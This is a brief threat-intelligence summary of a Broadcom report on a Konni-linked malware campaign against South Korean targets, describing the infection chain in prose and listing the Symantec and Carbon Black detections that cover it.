Broadcom described a multi-stage malware campaign potentially linked to the North Korean Konni APT group that targeted entities primarily in South Korea. The intrusion began with a ZIP archive containing a disguised LNK shortcut that launched obfuscated PowerShell to download and execute additional payloads. The final payload was a remote access Trojan that established persistence, collected system information and directory listings, and exfiltrated the results to a compromised command-and-control server. The report also listed Symantec and Carbon Black detections, including PowerShell behavior detections, malicious LNK classifications, downloader and Trojan signatures, and email-security coverage.